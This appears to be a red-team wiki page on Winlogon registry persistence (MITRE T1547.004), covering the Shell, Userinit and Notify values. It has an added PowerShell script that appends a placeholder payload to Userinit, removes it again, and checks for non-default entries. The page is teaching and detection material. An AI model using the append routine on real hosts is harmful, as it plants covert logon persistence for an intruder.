Winlogon Persistence
MITRE ATT&CK™ Boot or Logon Autostart Execution: Winlogon Helper DLL - Technique T1547.004
Theory
Winlogon is a critical Windows component responsible for handling user logons, loading user profiles, and managing session behaviors after authentication. Attackers can abuse registry values under the Winlogon key to establish persistence by configuring malicious executables or DLLs to execute during the logon process.
Registry Values & Their Behaviors:
The following values under HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon (and, for a per-user variant, the same path under HKCU) can be modified for persistence:
Shell – Specifies the user shell (default: explorer.exe). Replacing this value with a malicious executable launches it instead of Explorer; appending it as a comma-separated entry launches it alongside Explorer.
Userinit – Defines the path of userinit.exe (default: C:\Windows\system32\userinit.exe, followed by a trailing comma), which sets up the user environment after logon. Appending a malicious binary here executes it before the user's desktop loads.
Notify – A subkey whose entries point to DLLs loaded into winlogon.exe to handle session events (lock, unlock, logon, logoff). A malicious DLL registered here is loaded by winlogon.exe and therefore runs as SYSTEM. Winlogon notification packages are only honored on Windows XP / Server 2003 and earlier; Vista and later ignore this subkey.
Practice
Registry entries under HKU/HKCU will only apply to that user (no elevated privileges required).
Registry entries under HKLM will apply to everyone who logs on (writing them requires administrative privileges).
If we replaced any of these executables with a reverse shell, we would break the logon sequence, which isn't desired. Instead, Winlogon accepts a comma-separated list in these values and processes each entry in turn, so the payload can be appended after the legitimate binary.
We may edit the Userinit value under the Winlogon key so that our payload is executed during Windows logon:
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
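As an added example (not part of the original page), the following PowerShell appends a payload to the HKLM Userinit value without replacing userinit.exe, removes it again for cleanup, and includes a check a defender can run to spot non-default entries in Userinit or Shell. The key path is the one listed above; the payload path C:\Tools\payload.exe is a placeholder, and the session must be elevated for HKLM writes.

```powershell
# Added example, not from the original page. Run elevated on a lab host.
# Assumption: C:\Tools\payload.exe is a placeholder binary you control.

$WinlogonKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
$Payload     = 'C:\Tools\payload.exe'   # placeholder payload path

function Get-WinlogonUserinit {
    param([string]$Key = $WinlogonKey)
    (Get-ItemProperty -Path $Key -Name Userinit).Userinit
}

function Split-WinlogonValue {
    # Winlogon stores comma-separated lists; the default Userinit value ends
    # with a trailing comma, so drop empty entries after splitting.
    param([string]$Value)
    @($Value -split ',' | ForEach-Object { $_.Trim() } | Where-Object { $_ })
}

function Add-WinlogonUserinitEntry {
    param(
        [Parameter(Mandatory)][string]$Path,
        [string]$Key = $WinlogonKey
    )
    $entries = Split-WinlogonValue (Get-WinlogonUserinit -Key $Key)
    if ($entries -contains $Path) { return (Get-WinlogonUserinit -Key $Key) }
    # Keep userinit.exe first so the logon sequence still completes, then
    # re-add the trailing comma Windows expects.
    $new = ((@($entries) + $Path) -join ',') + ','
    Set-ItemProperty -Path $Key -Name Userinit -Value $new
    Get-WinlogonUserinit -Key $Key
}

function Remove-WinlogonUserinitEntry {
    # Cleanup: strip only our entry, leaving the legitimate binary in place.
    param(
        [Parameter(Mandatory)][string]$Path,
        [string]$Key = $WinlogonKey
    )
    $entries = Split-WinlogonValue (Get-WinlogonUserinit -Key $Key) |
        Where-Object { $_ -ine $Path }
    Set-ItemProperty -Path $Key -Name Userinit -Value ((@($entries) -join ',') + ',')
    Get-WinlogonUserinit -Key $Key
}

function Test-WinlogonValues {
    # Blue-team check: report any Userinit/Shell entry that is not the stock binary.
    param([string]$Key = $WinlogonKey)
    $props    = Get-ItemProperty -Path $Key
    $expected = @{
        Userinit = "$env:SystemRoot\system32\userinit.exe"
        Shell    = 'explorer.exe'
    }
    foreach ($name in $expected.Keys) {
        foreach ($entry in (Split-WinlogonValue $props.$name)) {
            if ($entry -ine $expected[$name]) {
                [pscustomobject]@{ Value = $name; Suspicious = $entry }
            }
        }
    }
}

# Usage (lab only):
#   Add-WinlogonUserinitEntry -Path $Payload
#     -> C:\Windows\system32\userinit.exe,C:\Tools\payload.exe,
#   Test-WinlogonValues
#     -> flags C:\Tools\payload.exe under Userinit
#   Remove-WinlogonUserinitEntry -Path $Payload
```

The same functions work against the per-user key by passing -Key 'HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon', which does not need an elevated session. Test-WinlogonValues is the check to run in an incident: any second entry in Userinit, or anything other than explorer.exe in Shell, deserves a look.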
Resources